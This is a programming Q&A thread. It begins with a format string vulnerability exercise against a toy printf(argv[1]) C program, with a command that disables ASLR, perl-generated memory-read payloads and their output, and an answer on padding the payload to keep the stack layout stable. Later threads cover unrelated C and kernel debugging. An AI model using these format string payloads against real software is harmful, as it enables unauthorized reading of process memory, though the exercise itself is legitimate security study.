Format String Vulnerability exercise - c

I'm trying to exploit a format string vulnerability just for exercise but something is going wrong. My goal is to exploit such a bug in order to read from a certain address chosen by me.
This is the code I'm trying to exploit:
#include <stdio.h>
void main(int argc, char *argv[]){
printf(argv[1]);
}
This program is running on an x86 machine with a 2.6.20 Linux kernel.
I'm trying to print the bytes stored at the address 0x80483cb, which belongs to the code section:
...
80483cb: e8 e8 fe ff ff call 80482b8 <printf@plt>
80483d0: 83 c4 10 add $0x10,%esp
80483d3: b8 00 00 00 00 mov $0x0,%eax
...
Just to be sure I've also disabled the ASLR with:
echo 0 > /proc/sys/kernel/randomize_va_space
I've found the exact location where to store the memory address doing:
./print AAAA`perl -e 'print "%08x."x141'`
AAAA00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.
bffff108.b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.
bffff0b0.b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.
b7ff66b0.b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.
08048440.b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2ac.bffff2b4.00000000.bffff57a.bffff5dd.
bffff5f1.bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.
bffff711.bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.
bffffce7.bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.
bfffff0a.bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.
bfffffb7.bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.
078bfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.
00000007.00000007.b7fea000.00000008.00000000.00000009.080482d0.0000000b.00000000.0000000c.
00000000.0000000d.00000000.0000000e.00000000.00000017.00000000.0000000f.bffff29b.00000000.
00000000.00000000.00000000.00000000.69000000.00363836.00000000.00000000.00000000.72702f2e.
00746e69.41414141.
Finally I tried to print the above bytes doing:
./print $(printf "\xcb\x83\x04\x08")`perl -e 'print "%08x."x140 . "%s"'`
But what I got is a segmentation fault before I could see those bytes:
00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.bffff108.
b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.bffff0b0.
b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.b7ff66b0.
b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.08048440.
b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2af.bffff2b7.00000000.bffff57a.bffff5dd.bffff5f1.
bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.bffff711.
bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.bffffce7.
bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.bfffff0a.
bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.bfffffb7.
bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.078bfbff.
00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.
00000007.b7fea000.00000008.000Segmentationfault
What I expected to see on screen was the bytes stored at that address, printed as characters up to the first \x00. What am I doing wrong?

This would work if you didn't change the length of your argument.
You remove one %08x. (5 bytes) and add one %s (2 bytes). This makes your input 3 bytes shorter, which shifts the stack layout, so the %s is likely no longer consuming the address you placed at the start of the argument.
I recommend writing a small script that will always pad your string to a fixed size. This helps to avoid such changes.
Keep in mind that changing your environment ($PWD (cd ..), adding/removing environment variables, etc.) will also change the stack layout. Resetting the environment can be of help here (env -i).
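A minimal sketch of such a padding helper, written in C rather than as a shell script. The name build_payload, the 'X' filler and the layout (address, filler, a run of "%x." pops, final conversion) are assumptions for illustration only, and the address bytes must not contain a NUL:

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: builds "<addr><filler><n_pops x "%x."><last>" so that
 * the result is always exactly total_len bytes long (not counting the NUL).
 * Returns 0 on success, -1 if the pieces do not fit. */
int build_payload(char *out, size_t out_size, const char addr[4],
                  size_t n_pops, const char *last, size_t total_len)
{
    size_t fixed = 4 + n_pops * 3 + strlen(last);
    if (fixed > total_len || total_len + 1 > out_size)
        return -1;

    size_t pad = total_len - fixed;   /* filler absorbs any length change */
    char *p = out;

    memcpy(p, addr, 4);               /* the address to be read by %s */
    p += 4;
    memset(p, 'X', pad);              /* printed literally, harmless */
    p += pad;
    for (size_t i = 0; i < n_pops; i++) {
        memcpy(p, "%x.", 3);          /* each one consumes a stack word */
        p += 3;
    }
    strcpy(p, last);                  /* "%x" while probing, "%s" for the read */
    return 0;
}
```

Calling it once with "%08x" and once with "%s" as the last conversion, with the same total_len, gives two arguments of identical length, so the stack layout should stay the same between the probing run and the real run.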
Here is a run of the vuln program without changing the length of the argument:
$ ./nagga $(printf "\x41\x41\x41\x41")XX`perl -e 'print "%x."x118 . "%x"'`;
AAAAXX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.c1a6169f.f6a2b28f.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f4000000.2b137f67.69b01f05.93944d19.697a2611.363836.0.616e2f2e.616767.41414141
$ ./nagga $(printf "\x70\x84\x04\x08")XX`perl -e 'print "%x."x118 . "%s"'`;
p�XX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.187cff94.2f785b84.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f000000.5f19366a.9135f3e8.e60e0ac6.69afc87d.363836.0.616e2f2e.616767.�Ë$Ð���������U��S�������t��f����Ћ���u���[]Ð�S��r
Works as expected.

Related

Reading data pointed to by an address

Working on my reversing skillset here, and I came upon something I thought I understood, but I managed to confuse myself.
Working in C mainly
My function returns me an address for the information I want to access.
LRESULT ret = SendMessage(hComboBox, CB_GETITEMDATA, (WPARAM)0 , (LPARAM) 0);
// the exact function doesn't really matter here.
printf("Address: %p\n", ret); // Output is 09437DF8
A dump of this address results in
09437DF8 A0 55 E8 12
This is the address (note endianness) of the data I really want to read.
12e855A0
12 E8 55 A0 - 30 00 3A 00 30 00 33 00 3A 00 32 00 32 00 00 00 - UNICODE "0:03:22"
Now I'm fairly certain this is just basic pointers/referencing/de-referencing, but I can't wrap my head around what I have to do to read this value programmatically.
wprintf(L"%s\n", <value at address pointed to by ret>);
// Yes its a null terminated string
// Im working via injected dll, so no access violations
// string is unicode
Perhaps something like this?
#include <stdio.h>
#include <wchar.h>
int main()
{
wchar_t *name = L"UNICODE String";
void **ret = (void **)&name;
wprintf(L"%ls \n", *(wchar_t **)ret);
return 0;
}

Dynamic C code execution: memory references

tl;dr : I'm trying to execute dynamically some code from another snippet. But I am stuck with handling memory reference (e.g. mov 40200b, %rdi): can I patch my code or the snippet running code so that 0x40200b is resolved correctly (as the offset 200b from the code)?
To generate the code to be executed dynamically I start from a (kernel) object and I resolve the references using ld.
#!/usr/bin/python
import os, subprocess
if os.geteuid() != 0:
    print('Run this as root')
    exit(-1)
with open("/proc/kallsyms","r") as f:
    out=f.read()
sym= subprocess.Popen( ['nm', 'ebbchar.ko', '-u' ,'--demangle', '-fposix'],stdout=subprocess.PIPE)
v=''
for sym in sym.stdout:
    s = " "+ sym.split()[0]+ "\n"
    off = out.find(s)
    v += "--defsym "+s.strip() + "=0x" +out[off-18:off -2]+" "
print(v)
os.system("ld ebbchar.ko "+ v +"-o ebbchar.bin");
I then transmit the code to be executed through a mmaped file
int fd = open(argv[1], O_RDWR | O_SYNC);
address1 = mmap(NULL, page_size, PROT_WRITE|PROT_READ , MAP_SHARED, fd, 0);
int in=open(argv[2],O_RDONLY);
sz= read(in, buf+8,BUFFER_SIZE-8);
uint64_t entrypoint=atol(argv[3]);
*((uint64_t*)buf)=entrypoint;
write(fd, buf, min(sz+8, (size_t) BUFFER_SIZE));
I execute the code dynamically with this code
struct mmap_info *info;
copy_from_user((void*)(&info->offset),buf,8);
copy_from_user(info->data, buf+8, sz-8);
unsigned long (*func)(void);
func = (void *)(info->data + info->offset);
int ret= func();
This approach works for code that doesn't access memory, such as "\x55\x48\x89\xe5\xc7\x45\xf8\x02\x00\x00\x00\xc7\x45\xfc\x03\x00\x00\x00\x8b\x55\xf8\x8b\x45\xfc\x01\xd0\x5d\xc3", but I have problems when memory is involved.
See example below.
Let's assume I want to dynamically execute the function vm_close. objdump -d -S returns:
0000000000401017 <vm_close>:
{
401017: e8 e4 07 40 81 callq ffffffff81801800 <__fentry__>
printk(KERN_INFO "vm_close");
40101c: 48 c7 c7 0b 20 40 00 mov $0x40200b,%rdi
401023: e9 b6 63 ce 80 jmpq ffffffff810e73de <printk>
At execution, my function pointer points to the right code:
(gdb) x/12x $rip
0xffffc90000c0601c: 0x48 0xc7 0xc7 0x0b 0x20 0x40 0x00 0xe9
0xffffc90000c06024: 0xb6 0x63 0xce 0x80
(gdb) x/2i $rip
=> 0xffffc90000c0601c: mov $0x40200b,%rdi
0xffffc90000c06023: jmpq 0xffffc8ff818ec3de
BUT, this code will fail since:
1) In my context $0x40200b points at the physical address $0x40200b, and not offset 200b from the beginning of the code.
2) I don't understand why but the address displayed there is actually different from the correct one (0xffffc8ff818ec3de != ffffffff810e73de) so it won't point on my symbol and will crash.
Is there a way to solve my 2 issues?
Also, I had trouble to find good documentation related to my issue (low-level memory resolution), if you could give me some, that would really help me.
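On point 2: e9 (jmp) and e8 (call) take a 32-bit displacement that is relative to the address of the next instruction, so the same bytes point somewhere else once the code is copied to a different address. A small sketch that redoes the arithmetic for the displacement bytes b6 63 ce 80 shown above (the helper name rel32_target is made up for illustration):

```c
#include <stdint.h>

/* Target of a jmp/call rel32: address of the next instruction plus the
 * sign-extended, little-endian 32-bit displacement. */
uint64_t rel32_target(uint64_t insn_addr, unsigned insn_len,
                      const unsigned char disp[4])
{
    uint64_t d = (uint64_t)disp[0] | (uint64_t)disp[1] << 8 |
                 (uint64_t)disp[2] << 16 | (uint64_t)disp[3] << 24;

    if (d & 0x80000000u)              /* negative displacement: sign-extend */
        d |= 0xffffffff00000000ULL;

    return insn_addr + insn_len + d;  /* wraps modulo 2^64, like the CPU */
}
```

With the jmpq at its link-time address 0x401023 (5 bytes long) this gives 0xffffffff810e73de, which is printk. With the same bytes at 0xffffc90000c06023 it gives 0xffffc8ff818ec3de, which is the address gdb displays.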
Edit: Since I run the code in the kernel I cannot simply compile the code with -fPIC or -fpie which is not allowed by gcc (cc1: error: code model kernel does not support PIC mode)
Edit 24/09:
According to @Peter Cordes's comment, I recompiled it, adding mcmodel=small -fpie -mno-red-zone -mnosse to the Makefile (/lib/modules/$(uname -r)fixed/build/Makefile)
This is better than in the original version since the generated code before linking is now:
0000000000000018 <vm_close>:
{
18: ff 15 00 00 00 00 callq *0x0(%rip) # 1e <vm_close+0x6>
printk(KERN_INFO "vm_close");
1e: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 25 <vm_close+0xd>
25: e8 00 00 00 00 callq 2a <vm_close+0x12>
}
2a: c3 retq
So thanks to RIP-relative addressing, I'm now able to access the other variables in my script.
After linking, I can successfully access my variable embedded within the buffer:
40101e: 48 8d 3d e6 0f 00 00 lea 0xfe6(%rip),%rdi # 40200b
Still, one problem remains:
The symbol I want to access (printk) and my executable buffer are in different address ranges, for example:
printk=0xffffffff810e73de:
Executable_buffer=0xffffc9000099d000
But in my callq to printk, I have only 32 bits to write the address to call, as an offset from $rip, since there is no .got section in the kernel. This means that printk has to be located within [$rip - 2 GB, $rip + 2 GB], which is not the case here.
Is there a way to reach printk even though it is located more than 2 GB away from my buffer (I tried mcmodel=medium but I haven't seen any difference in the generated code), for instance by modifying gcc options so that the binary actually has a .got section?
Or is there a reliable way to force my executable and potentially-too large-for-kmalloc buffer to be allocated in the [0xffffffff00000000 ; 0xffffffffffffffff] range? (I currently use __vmalloc(BUFFER_SIZE, GFP_KERNEL, PAGE_KERNEL_EXEC); )
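Whether a direct call can reach its target comes down to whether the distance fits in a signed 32-bit displacement. A minimal sketch of that check (the helper name reachable_rel32 is hypothetical, and it assumes a 5-byte call/jmp rel32 instruction):

```c
#include <stdint.h>

/* Returns 1 if 'target' can be reached by a 5-byte call/jmp rel32 located
 * at 'insn_addr', i.e. the displacement fits in a signed 32-bit value. */
int reachable_rel32(uint64_t insn_addr, uint64_t target)
{
    uint64_t d = target - (insn_addr + 5);   /* wraps modulo 2^64 */

    /* Fits if d is in [0, 2^31 - 1] or, seen as negative, in [-2^31, -1]. */
    return d <= 0x7fffffffULL || d >= 0xffffffff80000000ULL;
}
```

For the two addresses above, reachable_rel32(0xffffc9000099d000, 0xffffffff810e73de) returns 0, while a buffer somewhere in the top 2 GB of the address space (0xffffffffa0000000, picked only as an example) would be in range.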
Edit 27/09:
I succeeded in allocating my buffer in the [0xffffffff00000000 ; 0xffffffffffffffff] range using the non-exported __vmalloc_node_range function as a (dirty) hack.
IMPORTED(__vmalloc_node_range)(BUFFER_SIZE, MODULE_ALIGN,
MODULES_VADDR + get_module_load_offset(),
MODULES_END, GFP_KERNEL,
PAGE_KERNEL_EXEC, 0, NUMA_NO_NODE,
__builtin_return_address(0));
Then, when I know the address of my executable buffer and the address of the kernel symbols (by parsing /proc/kallsyms), I can patch my binary using ld’s option --defsym symbol=relative_address where relative_address = symbol_address - buffer_offset .
Despite being extremely dirty, this approach actually works.
But I need to relink my binary each time I execute it since the buffer may (and will) be allocated at a different address. To solve this issue, I think the best way would be to build my executable as a real position independent executable so that I can just patch the global offset table and not fully relink the module.
But with the options provided there I got a rip-relative address but no got/plt. So I'd like to find a way to build my module as a proper PIE.
This post is getting huge, messy and we are deviating from the original question. Thus, I opened a new simplified post there. If I get interesting answers, I'll edit this post to explain them.
Note: For the sake of simplicity, safety checks are not shown here
Note 2: I am perfectly aware that my PoC is very unusual and can be a bad practice but I'd like to do it anyway.

UBSan: Store to misaligned address; what is the problem, and should I care

I've been running some code under UBSan, and found an error which I've never seen before:
/usr/include/c++/7/bits/stl_algobase.h:324:8: runtime error: store to misaligned address 0x611000001383 for type 'struct complex', which requires 4 byte alignment
0x611000001383: note: pointer points here
66 46 40 02 00 00 00 00 00 00 00 00 04 01 18 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00
^
(g++-7.3.0, Ubuntu 18.04, flags -fsanitize=address -fsanitize=undefined)
What does this error mean? Is it truly an error (it is in the standard library, so it can't be too bad, right?), and should I care about it?
You probably use a pointer cast which casts a block of raw memory to a complex*.
Example:
void* raw = getBuffer(); // Made up function which returns a buffer
auto size = *static_cast<uint16_t*>(raw); // Maybe your format says that you got a 2 Byte size in front
auto* array = static_cast<complex*>(static_cast<void*>(static_cast<char*>(raw) + sizeof(uint16_t))); // ... and complex numbers after
std::transform(array, array+size, ...); // Pass this into STL
Boom! You got UB.
Why?
The behavior is undefined in the following circumstances: [...]
Conversion between two pointer types produces a result that is incorrectly aligned
[...]
If the resulting pointer is not correctly aligned [68] for the referenced type, the behavior is undefined.
See https://stackoverflow.com/a/46790815/1930508 (where I got these from)
What does it mean?
Every pointer must be aligned to the type it is pointing to. For complex this means an alignment of 4. In short, the address stored in array (from above) must be evenly divisible by 4 (i.e. array % 4 == 0). Assuming that raw is aligned to 4 bytes, you can easily see that array cannot be, since (raw + 2) % 4 == 2 (because raw % 4 == 0).
If the size would be a 4-Byte value, then array would have been aligned if (and only if) raw was aligned. Whether this is guaranteed depends on where it comes from.
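To make the arithmetic concrete, here is a small sketch in C (C11). The struct complex_f and both helper names are hypothetical stand-ins, and the memcpy-based load is one common way to read from a possibly misaligned position, not necessarily the right fix for your code:

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the 'complex' type from the error message. */
struct complex_f { float re, im; };

/* 1 if p satisfies the alignment requirement of struct complex_f. */
int is_aligned_for_complex(const void *p)
{
    return (uintptr_t)p % _Alignof(struct complex_f) == 0;
}

/* Reads one value from a possibly misaligned position by copying the bytes
 * into a properly aligned object instead of casting the pointer. */
struct complex_f load_complex(const void *p)
{
    struct complex_f c;
    memcpy(&c, p, sizeof c);
    return c;
}
```

On a typical platform where float needs 4-byte alignment, a 4-byte aligned buffer passes the check while buffer + 2 does not, yet load_complex(buffer + 2) is still well defined.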
So yes this is truly an error and may lead to a real bug although not always (depending on moon phase etc. as it is always with UB, see the answer above for details)
And no, it is NOT in the STL; it just happens to be detected there because UBSan checks memory accesses. So while the actual UB is the static_cast<complex*>, it is only detected when that pointer is dereferenced (here, by a store).
You can use export UBSAN_OPTIONS=print_stacktrace=1 prior to executing the program to get a stacktrace and find out where your wrong cast is.
Tip: You only need to check casts. Any struct/type allocated via new is always aligned (and every member inside), unless tricks like "packed structs" are used.

How to count letters before cursor in bash using linux c?

For example, with "[root@localhost ~]# asd", the count before the cursor should be strlen("[root@localhost ~]# asd") when the cursor is right after the letter 'd'.
You could call some of the functions provided in the bash headers, as shown in this blog post.
It might be as simple as something like:
#include <config.h>
#include "../bashtypes.h"
#include <stdio.h>
#include "../bashintl.h"
#include "../shell.h"
#include "common.h"
...
int getPS1Len () {
char *ps1 = get_string_value ("PS1");
if (ps1 != 0) {
ps1 = decode_prompt_string (ps1);
if (ps1 != 0) {
return strlen(ps1);
}
}
return 0;
}
...
(Totally untested code, copied with some changes from the linked post.)
If you're using the linux console or a VT-100 emulator with similar emulation (konsole and xterm, for example), then you can query the current cursor position by writing the following ECMA-48 control sequence to the terminal.
ESC [ 6 n
where ESC is hexadecimal code 1b. The terminal will respond with the sequence:
ESC [ ## ; ## R
where the first ## is the row number and the second ## is the column number of the cursor location, both expressed as decimal numbers without leading zeros.
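Since the question asks about C, here is a rough sketch of the same query from a C program. It assumes a POSIX system with termios; the function names parse_cursor_report and query_cursor are made up for illustration, and error handling is kept to a minimum:

```c
#include <stdio.h>
#include <termios.h>
#include <unistd.h>

/* Parse a cursor position report of the form ESC [ row ; col R.
 * Returns 0 on success, -1 if the text does not match. */
int parse_cursor_report(const char *resp, int *row, int *col)
{
    char end = 0;

    if (sscanf(resp, "\x1b[%d;%d%c", row, col, &end) != 3 || end != 'R')
        return -1;
    return 0;
}

/* Ask the terminal on fd for the cursor position.
 * Returns 0 on success, -1 on failure (e.g. fd is not a terminal). */
int query_cursor(int fd, int *row, int *col)
{
    struct termios saved, raw;
    char buf[32];
    size_t n = 0;
    int rc = -1;

    if (tcgetattr(fd, &saved) == -1)
        return -1;
    raw = saved;
    raw.c_lflag &= ~(tcflag_t)(ICANON | ECHO);  /* unbuffered, no echo */
    raw.c_cc[VMIN] = 1;
    raw.c_cc[VTIME] = 0;
    if (tcsetattr(fd, TCSANOW, &raw) == -1)
        return -1;

    if (write(fd, "\x1b[6n", 4) == 4) {
        /* Collect the reply one byte at a time, up to the final 'R'. */
        while (n < sizeof buf - 1 && read(fd, &buf[n], 1) == 1) {
            if (buf[n++] == 'R')
                break;
        }
        buf[n] = '\0';
        rc = parse_cursor_report(buf, row, col);
    }
    tcsetattr(fd, TCSANOW, &saved);             /* restore terminal modes */
    return rc;
}
```

Calling query_cursor(STDIN_FILENO, &row, &col) from a program attached to a terminal should fill in the 1-based row and column; the column minus one is then the number of character cells before the cursor on that line.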
Here's an example, to show how it works (no C code, just shell):
$ IFS= read -p "This is a prompt: "$'\e[6n' -dR -rs CURSOR; read -r RESPONSE
This is a prompt: Hello, world!
$ hd <<<"$CURSOR"
00000000 1b 5b 33 38 3b 31 39 0a |.[38;19.|
00000008
$ hd <<<"$RESPONSE"
00000000 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 21 0a |Hello, world!.|
0000000e
The first command-line, consisting of two read commands does the following:
Print the string This is a prompt: followed by the cursor query console code. (-p PROMPT command-line option to read)
Read the input up to the first R (-dR command-line option), storing it in the shell variable CURSOR. This input is not echoed back to the terminal (-s command-line option).
Read a line of input, storing it in the shell variable RESPONSE
From the query response stored in CURSOR, you can see that the cursor (prior to my typing Hello, world!) was at column 19 of row 38.
You could do exactly the same thing from the inside of a programmable-completion function, for example. I'm not sure how else you could run a program in the middle of terminal input, but if you can figure out how to run a program, that program can issue the cursor position query and read the query report, as above.

Process Coredumped but does not look like illegal reference in a multithreaded program

Backtrace of the coredump:
#0 0x0000000000416228 in add_to_epoll (struct_fd=0x18d32760, lno=7901) at lbi.c:7092
#1 0x0000000000418b54 in connect_fc (struct_fd=0x18d32760, type=2) at lbi.c:7901
#2 0x0000000000418660 in poll_fc (arg=0x0) at lbi.c:7686
#3 0x00000030926064a7 in start_thread () from /lib64/libpthread.so.0
#4 0x0000003091ed3c2d in clone () from /lib64/libc.so.6
Code Snippet:
#define unExp(x) __builtin_expect((x),0)
...
7087 int add_to_epoll( struct fdStruct * struct_fd, int lno)
7088 {
7089 struct epoll_event ev;
7090 ev.events = EPOLLIN | EPOLLET | EPOLLPRI | EPOLLERR ;
7091 ev.data.fd = fd_st->fd;
7092 if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, struct_fd->fd,&ev) == -1))
7093 {
7094 perror("client FD ADD to epoll error:");
7095 return -1;
7096 }
7097 else
7098 {
...
7109 }
7110 return 1;
7111 }
Disassembly of the offending line. I am not good at interpreting assembly code but have tried my best:
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, stuct_fd->fd,&ev) == -1))
416210: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->fd
416214: 8b 10 mov (%rax),%edx // to EDX
416216: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->Hdr->info->epollfd
41621a: 48 8b 80 e8 01 00 00 mov 0x1e8(%rax),%rax // to EDI which failed
416221: 48 8b 80 58 01 00 00 mov 0x158(%rax),%rax // while trying to offset members of the structure
416228: 8b 78 5c mov 0x5c(%rax),%edi // <--- failed here since Reg AX is 0x0
41622b: 48 8d 4d e0 lea 0xffffffffffffffe0(%rbp),%rcx
41622f: be 01 00 00 00 mov $0x1,%esi
416234: e8 b7 e1 fe ff callq 4043f0 <epoll_ctl@plt>
416239: 83 f8 ff cmp $0xffffffffffffffff,%eax
41623c: 0f 94 c0 sete %al
41623f: 0f b6 c0 movzbl %al,%eax
416242: 48 85 c0 test %rax,%rax
416245: 74 5e je 4162a5 <add_to_epoll+0xc9>
Printing out Registers and struct member values:
(gdb) i r $rax
rax 0x0 0
(gdb) p struct_fd
$3 = (struct fdStruct *) 0x18d32760
(gdb) p struct_fd->Hdr
$4 = (StHdr *) 0x3b990f30
(gdb) p struct_fd->Hdr->info
$5 = (struct Info *) 0x3b95b410 // Strangely, this is NOT NULL. Inconsistent with assembly dump.
(gdb) p ev
$6 = {events = 2147483659, data = {ptr = 0x573dc648000003d6, fd = 982, u32 = 982, u64= 6286398667419026390}}
Please let me know if my dis-assembly interpretation is OK. And if yes, would like to understand why gdb not showing NULL when it is printing out the structure members.
OR if the analysis is not perfect would like to know the actual reason of coredump. Please let me know if you need more info.
Thanks
---- The following part has been added Later ----
The proxy is a multithreaded program. After more digging, I found that when the problem occurs, the following two threads were running in parallel. When I prevent the two functions from running in parallel, the problem never occurs. However, I cannot explain how this behavior leads to the scene shown in the coredump:
Thread 1:
------------------------------------------------------------
int new_connection() {
...
struct_fd->Hdr->info=NULL; /* (line 1) */
...
<some code>
...
struct_fd->Hdr->info=Golbal_InFo_Ptr; /* (line 2) */ // This is a malloced memory, once allocated never freed
...
...
}
------------------------------------------------------------
Thread 2 executing add_to_epoll():
------------------------------------------------------------
int add_to_epoll( struct fdStruct * struct_fd, int lno)
{
...
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd,...) /* (line 3) */
...
}
------------------------------------------------------------
In the above snippets if execution is done in the order,
Line 1,
Line 3,
Line 2,
the scene can occur. What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
It is a definite behavior because till now I have got around 12 coredumps of the same problem, all showing the exact same thing.
It is clear that struct_fd->Hdr->info is NULL, as Per Johansson already answered.
However, GDB thinks that it is not. How could that be?
One common way this happens is when you change the layout of struct fdStruct, struct StHdr (or both), and you neglect to rebuild all objects that use these definitions.
The disassembly shows that offsetof(struct fdStruct, Hdr) == 0x1e8 and offsetof(struct StHdr, info) == 0x158. See what GDB prints for the following:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
I bet it would print something other than 0x1e8 and 0x158.
If that's the case, make clean && make may fix the problem.
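The same offsets can also be printed from C with offsetof, compiled with the same headers and flags as the rest of the build. A sketch with made-up stand-in structs (demo_fd, demo_hdr and their padding are hypothetical, sized only so the offsets come out as 0x1e8 and 0x158; in the real program you would use struct fdStruct and StHdr):

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical stand-ins; the pad arrays only exist to push the pointer
 * members to the offsets seen in the disassembly. */
struct demo_info { int epollfd; };
struct demo_hdr  { char pad[0x158]; struct demo_info *info; };
struct demo_fd   { int fd; char pad[0x1e4]; struct demo_hdr *hdr; };

/* Prints the member offsets the compiler actually used for this build. */
void print_layout(void)
{
    printf("hdr  at 0x%zx\n", offsetof(struct demo_fd, hdr));
    printf("info at 0x%zx\n", offsetof(struct demo_hdr, info));
}
```

If the values printed by a freshly built object differ from the displacements in the disassembly of an older object, that older object was compiled against a stale definition.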
Update:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
$1 = 0x1e8
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
$3 = 0x158
This proves that GDB's idea of how objects are laid out in memory matches compiled code.
We still don't know whether GDB's idea of the value of struct_fd matches reality. What do these commands print?
(gdb) print struct_fd
(gdb) x/gx $rbp-40
They should produce the same value (0x18d32760). Assuming they do, the only other explanation I can think of is that you have multiple threads accessing struct_fd, and the other thread overwrites the value that used to be NULL with the new value.
I just noticed your update to the question ;-)
What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
Your expectation is incorrect: on any modern CPU, you have multiple cores, and your threads are executing simultaneously. That is, you have this code (time goes down along Y axis):
char *p; // global

Time  CPU0       CPU1
0     p = NULL
1     if (*p)    p = malloc(1)
2                *p = 'a';
...
At T1, CPU0 traps into the OS, but CPU1 continues. Eventually, the OS processes hardware trap, and dumps memory state at that time. On CPU1, hundreds of instructions may have executed after T1. The clocks between CPU0 and CPU1 aren't even synchronized, they don't necessarily go in lock-step.
Moral of the story: don't access global variables from multiple threads without proper locking.
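A minimal sketch of what such locking could look like with a pthread mutex. The struct and function names here are hypothetical stand-ins for StHdr and struct Info, not the real definitions from the question:

```c
#include <pthread.h>
#include <stddef.h>

struct info { int epollfd; };   /* hypothetical stand-in for struct Info */
struct hdr {
    pthread_mutex_t lock;       /* protects the 'info' pointer */
    struct info *info;
};

/* Writer side: every update of the shared pointer happens under the lock. */
void hdr_set_info(struct hdr *h, struct info *new_info)
{
    pthread_mutex_lock(&h->lock);
    h->info = new_info;
    pthread_mutex_unlock(&h->lock);
}

/* Reader side: check and dereference while holding the same lock.
 * Returns 0 and stores the descriptor, or -1 if no info is attached. */
int hdr_get_epollfd(struct hdr *h, int *epollfd)
{
    int rc = -1;

    pthread_mutex_lock(&h->lock);
    if (h->info != NULL) {
        *epollfd = h->info->epollfd;
        rc = 0;
    }
    pthread_mutex_unlock(&h->lock);
    return rc;
}
```

With this shape, the thread running add_to_epoll() either sees a valid pointer or gets -1 and can retry or bail out, instead of dereferencing a pointer that another thread has temporarily set to NULL.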
The C line part of the disassembly does not match the one in the original code. But clearly
struct_fd->Hdr->info
